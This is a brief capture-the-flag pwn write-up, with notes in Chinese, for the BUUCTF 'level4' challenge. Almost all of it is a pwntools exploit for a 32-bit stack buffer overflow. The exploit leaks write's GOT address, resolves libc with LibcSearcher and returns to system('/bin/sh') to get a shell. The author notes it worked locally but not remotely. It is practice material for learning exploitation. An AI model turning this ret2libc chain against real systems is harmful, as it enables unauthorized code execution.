啥都没有，只有一个write，泄露函数地址查找libc

from pwn import *
from LibcSearcher import *

context(os="linux", arch="i386", log_level="debug")

p = process("./level4")
# p = remote("node4.buuoj.cn", 25077)

elf = ELF("./level4")
write_got = elf.got["write"]
write_plt = elf.plt["write"]
main_addr = elf.symbols["main"]

payload = b"a" * (0x88 + 4) + p32(write_plt)
payload += p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendline(payload)

write_addr = u32(p.recv(4))
print("write_addr:", hex(write_addr))

libc = LibcSearcher("write", write_addr)
libc_base = write_addr - libc.dump("write")
system_addr = libc_base + libc.dump("system")
binsh_addr = libc_base + libc.dump("str_bin_sh")

payload = b"a" * (0x88 + 4) + p32(system_addr)
payload += p32(main_addr) + p32(binsh_addr)
p.sendline(payload)

p.interactive()

远程没有打通，本地打通